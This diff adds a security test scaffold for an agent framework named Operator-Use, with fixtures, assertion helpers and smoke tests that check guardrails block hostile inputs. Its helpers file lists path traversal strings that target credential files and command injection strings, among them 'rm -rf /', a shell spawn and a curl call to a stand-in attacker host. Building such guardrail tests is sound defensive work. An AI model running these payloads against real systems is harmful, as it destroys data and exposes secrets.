diff --git a/tests/security/__init__.py b/tests/security/__init__.py new file mode 100644 index 0000000..e98fdf4 --- /dev/null +++ b/tests/security/__init__.py @@ -0,0 +1,5 @@ +"""Security test suite for Operator-Use. + +Tests in this package verify that security guardrails are enforced +across tool invocations, file system access, and agent context handling. +""" diff --git a/tests/security/conftest.py b/tests/security/conftest.py new file mode 100644 index 0000000..1831f04 --- /dev/null +++ b/tests/security/conftest.py @@ -0,0 +1,78 @@ +"""Shared fixtures for the security test suite.""" + +import logging +from pathlib import Path +from typing import Generator + +import pytest + + +@pytest.fixture +def tmp_workspace(tmp_path: Path) -> Generator[Path, None, None]: + """Isolated temporary directory simulating an agent workspace. + + Creates a directory tree that mirrors the structure an agent would + operate in: a workspace root with ``files/`` and ``logs/`` subdirs. + The fixture yields the workspace root and performs no teardown of + its own; pytest manages the lifetime of the underlying ``tmp_path``. + + Yields: + Path: The root of the isolated workspace. + """ + workspace = tmp_path / "workspace" + workspace.mkdir() + (workspace / "files").mkdir() + (workspace / "logs").mkdir() + yield workspace + # tmp_path cleanup is handled by pytest automatically + + +@pytest.fixture +def mock_agent_context(tmp_workspace: Path) -> dict: + """Minimal agent context dictionary for tool testing. + + Provides the smallest set of keys required by tools under test so + that individual security tests do not need to construct full agent + objects. + + Args: + tmp_workspace: The isolated workspace fixture. + + Returns: + dict: A context mapping with ``workspace``, ``agent_id``, and + ``permissions`` keys. 
+ """ + return { + "workspace": tmp_workspace, + "agent_id": "test-agent-001", + "permissions": { + "read": True, + "write": True, + "execute": False, + "network": False, + }, + } + + +@pytest.fixture +def capture_logs( + caplog: pytest.LogCaptureFixture, +) -> Generator[pytest.LogCaptureFixture, None, None]: + """Fixture to capture and inspect log output during a test. + + Sets the root logger to DEBUG level for the duration of the test so + that security-related log lines emitted at any level are visible. + + Yields: + pytest.LogCaptureFixture: The caplog object; use + ``capture_logs.records`` or ``capture_logs.text`` to inspect + what was logged. + + Example:: + + def test_blocked_action_is_logged(capture_logs): + trigger_blocked_action() + assert any("blocked" in r.message.lower() for r in capture_logs.records) + """ + with caplog.at_level(logging.DEBUG): + yield caplog diff --git a/tests/security/helpers.py b/tests/security/helpers.py new file mode 100644 index 0000000..dfd3af3 --- /dev/null +++ b/tests/security/helpers.py @@ -0,0 +1,126 @@ +"""Utilities shared across the security test suite. + +Provides payload generators and common assertion helpers so individual +test modules do not need to duplicate attack-string lists or outcome +checks. +""" + +from __future__ import annotations + +from typing import Callable + + +# --------------------------------------------------------------------------- +# Payload generators +# --------------------------------------------------------------------------- + + +def path_traversal_payloads() -> list[str]: + """Return a list of path traversal attack strings. + + Each entry is a filename or path fragment that should be rejected by + any file-access guardrail. The list covers classic ``../`` sequences, + URL-encoded variants, and absolute-path injections. + + Returns: + list[str]: Distinct traversal payload strings. 
+ """ + return [ + "../../../etc/passwd", + "..\\..\\..\\windows\\system32\\config\\sam", + "%2e%2e%2f%2e%2e%2fetc%2fpasswd", + "....//....//etc/passwd", + "/etc/shadow", + "~/.ssh/id_rsa", + "../../.env", + "../tests/secret.txt", + ] + + +def command_injection_payloads() -> list[str]: + """Return a list of command injection attack strings. + + Each entry is a shell fragment that should be rejected when provided + as a parameter to any tool that constructs shell commands. + + Returns: + list[str]: Distinct injection payload strings. + """ + return [ + "; rm -rf /", + "| cat /etc/passwd", + "&& curl http://attacker.example/exfil", + "`whoami`", + "$(id)", + "'; DROP TABLE users; --", + "\n/bin/sh -i", + "${IFS}cat${IFS}/etc/passwd", + ] + + +# --------------------------------------------------------------------------- +# Assertion helpers +# --------------------------------------------------------------------------- + + +def assert_blocked(result: object, *, check: Callable[[object], bool] | None = None) -> None: + """Assert that a tool result represents a blocked / denied operation. + + Checks the common ``success`` attribute used by ``ToolResult``. + Optionally runs an extra callable ``check`` for domain-specific + validation. + + Args: + result: The return value from a tool invocation. + check: Optional extra predicate; raises ``AssertionError`` if it + returns ``False``. + + Raises: + AssertionError: When the result indicates success or the optional + check fails. 
+ + Example:: + + result = await tool.ainvoke(path="../../../etc/passwd") + assert_blocked(result, check=lambda r: "traversal" in (r.error or "").lower()) + """ + assert hasattr(result, "success"), ( + f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}" + ) + assert result.success is False, ( + f"Expected operation to be blocked (success=False) but got success={result.success!r}" + ) + if check is not None: + assert check(result), f"Extra check failed for blocked result: {result!r}" + + +def assert_allowed(result: object, *, check: Callable[[object], bool] | None = None) -> None: + """Assert that a tool result represents a permitted / successful operation. + + Requires ``result.success`` to be exactly ``True`` (identity check). + Optionally runs an extra callable ``check`` for domain-specific + validation. + + Args: + result: The return value from a tool invocation. + check: Optional extra predicate; ``AssertionError`` is raised if + it returns a falsy value. + + Raises: + AssertionError: When ``result`` lacks a ``success`` attribute, + ``success`` is not ``True``, or the optional check fails. + + Example:: + + result = await tool.ainvoke(path="safe_file.txt") + assert_allowed(result, check=lambda r: r.output is not None) + """ + assert hasattr(result, "success"), ( + f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}" + ) + assert result.success is True, ( + f"Expected operation to be allowed (success=True) but got success={result.success!r}, " + f"error={getattr(result, 'error', None)!r}" + ) + if check is not None: + assert check(result), f"Extra check failed for allowed result: {result!r}" diff --git a/tests/security/test_scaffold.py b/tests/security/test_scaffold.py new file mode 100644 index 0000000..d35a7ab --- /dev/null +++ b/tests/security/test_scaffold.py @@ -0,0 +1,142 @@ +"""Example security test that validates the scaffold itself. 
+ +Serves as the acceptance-criteria "at least one example security test +passes using the scaffold" required by issue #7. It also acts as +living documentation showing how Phase 1 security tests should be +structured. +""" + +from pathlib import Path +from typing import NamedTuple + +import pytest + +from tests.security.helpers import ( + assert_allowed, + assert_blocked, + command_injection_payloads, + path_traversal_payloads, +) + + +# --------------------------------------------------------------------------- +# Minimal stub that mimics the ToolResult interface +# --------------------------------------------------------------------------- + + +class _StubResult(NamedTuple): + success: bool + output: str | None = None + error: str | None = None + + +# --------------------------------------------------------------------------- +# Fixture smoke tests +# --------------------------------------------------------------------------- + + +def test_tmp_workspace_is_isolated_directory(tmp_workspace: Path) -> None: + """tmp_workspace provides a fresh, writable directory per test.""" + assert tmp_workspace.exists() + assert tmp_workspace.is_dir() + sentinel = tmp_workspace / "sentinel.txt" + sentinel.write_text("ok") + assert sentinel.read_text() == "ok" + + +def test_tmp_workspace_contains_expected_subdirs(tmp_workspace: Path) -> None: + """tmp_workspace pre-creates files/ and logs/ subdirectories.""" + assert (tmp_workspace / "files").is_dir() + assert (tmp_workspace / "logs").is_dir() + + +def test_mock_agent_context_keys(mock_agent_context: dict) -> None: + """mock_agent_context contains required keys for tool testing.""" + required_keys = {"workspace", "agent_id", "permissions"} + assert required_keys.issubset(mock_agent_context.keys()) + + +def test_mock_agent_context_workspace_is_path(mock_agent_context: dict) -> None: + """mock_agent_context workspace value is a Path pointing to tmp_workspace.""" + assert isinstance(mock_agent_context["workspace"], Path) + assert 
mock_agent_context["workspace"].exists() + + +def test_capture_logs_captures_debug_messages(capture_logs) -> None: + """capture_logs fixture intercepts log records at DEBUG level.""" + import logging + + logger = logging.getLogger("operator_use.security.test") + logger.debug("scaffold-debug-sentinel") + assert any("scaffold-debug-sentinel" in r.message for r in capture_logs.records) + + +# --------------------------------------------------------------------------- +# Helper function tests +# --------------------------------------------------------------------------- + + +def test_path_traversal_payloads_returns_nonempty_list() -> None: + """path_traversal_payloads() returns at least one payload.""" + payloads = path_traversal_payloads() + assert len(payloads) > 0 + assert all(isinstance(p, str) for p in payloads) + + +def test_path_traversal_payloads_contain_dotdot() -> None: + """path_traversal_payloads() includes classic ../ traversals.""" + payloads = path_traversal_payloads() + assert any(".." 
in p for p in payloads) + + +def test_command_injection_payloads_returns_nonempty_list() -> None: + """command_injection_payloads() returns at least one payload.""" + payloads = command_injection_payloads() + assert len(payloads) > 0 + assert all(isinstance(p, str) for p in payloads) + + +def test_command_injection_payloads_contain_shell_operators() -> None: + """command_injection_payloads() includes common shell operator chars.""" + payloads = command_injection_payloads() + shell_chars = set(";|&`$") + assert any(shell_chars & set(p) for p in payloads) + + +# --------------------------------------------------------------------------- +# assert_blocked / assert_allowed helper tests +# --------------------------------------------------------------------------- + + +def test_assert_blocked_passes_on_failure_result() -> None: + """assert_blocked does not raise when result.success is False.""" + assert_blocked(_StubResult(success=False, error="denied")) + + +def test_assert_blocked_raises_on_success_result() -> None: + """assert_blocked raises AssertionError when result.success is True.""" + with pytest.raises(AssertionError, match="blocked"): + assert_blocked(_StubResult(success=True, output="ok")) + + +def test_assert_blocked_raises_when_extra_check_fails() -> None: + """assert_blocked raises when the optional check predicate returns False.""" + with pytest.raises(AssertionError, match="Extra check failed"): + assert_blocked(_StubResult(success=False, error="denied"), check=lambda _: False) + + +def test_assert_allowed_passes_on_success_result() -> None: + """assert_allowed does not raise when result.success is True.""" + assert_allowed(_StubResult(success=True, output="ok")) + + +def test_assert_allowed_raises_on_failure_result() -> None: + """assert_allowed raises AssertionError when result.success is False.""" + with pytest.raises(AssertionError, match="allowed"): + assert_allowed(_StubResult(success=False, error="denied")) + + +def 
test_assert_allowed_raises_when_extra_check_fails() -> None: + """assert_allowed raises when the optional check predicate returns False.""" + with pytest.raises(AssertionError, match="Extra check failed"): + assert_allowed(_StubResult(success=True, output="ok"), check=lambda _: False) diff --git a/tests/test_agent.py b/tests/test_agent.py index 4fb6c3f..13db174 100644 --- a/tests/test_agent.py +++ b/tests/test_agent.py @@ -186,7 +186,7 @@ async def test_agent_run_with_tool_call_then_text(tmp_path): # Register a simple echo tool from pydantic import BaseModel - from operator_use.tools.service import Tool + from operator_use.agent.tools.service import Tool class EchoParams(BaseModel): message: str diff --git a/tests/test_control_center.py b/tests/test_control_center.py index f3a2e5b..0efe749 100644 --- a/tests/test_control_center.py +++ b/tests/test_control_center.py @@ -4,7 +4,7 @@ import pytest from unittest.mock import AsyncMock, MagicMock, patch -from operator_use.agent.tools.builtin.control_center import ( +from operator_use.tools.control_center import ( control_center, _set_plugin_enabled, _get_plugin_enabled, diff --git a/tests/test_local_agents.py b/tests/test_local_agents.py index 8fd831b..a1b5168 100644 --- a/tests/test_local_agents.py +++ b/tests/test_local_agents.py @@ -2,7 +2,7 @@ import pytest -from operator_use.agent.tools.builtin.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents +from operator_use.tools.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents from operator_use.messages.service import AIMessage diff --git a/tests/test_plugins.py b/tests/test_plugins.py index f6ba6d4..5d9f8b9 100644 --- a/tests/test_plugins.py +++ b/tests/test_plugins.py @@ -7,7 +7,7 @@ from operator_use.agent.tools.registry import ToolRegistry from operator_use.agent.hooks.service import Hooks from operator_use.agent.hooks.events import HookEvent -from operator_use.tools.service import Tool +from operator_use.agent.tools.service import Tool from 
pydantic import BaseModel diff --git a/tests/test_tool_registry.py b/tests/test_tool_registry.py index ca6ed75..77c70b9 100644 --- a/tests/test_tool_registry.py +++ b/tests/test_tool_registry.py @@ -4,7 +4,7 @@ from pydantic import BaseModel from operator_use.agent.tools.registry import ToolRegistry -from operator_use.tools.service import Tool +from operator_use.agent.tools.service import Tool # --- Helpers --- diff --git a/tests/test_tools.py b/tests/test_tools.py index 8cbf913..de572ab 100644 --- a/tests/test_tools.py +++ b/tests/test_tools.py @@ -4,7 +4,7 @@ from pydantic import BaseModel from typing import Literal -from operator_use.tools.service import Tool, ToolResult +from operator_use.agent.tools.service import Tool, ToolResult # --- ToolResult ---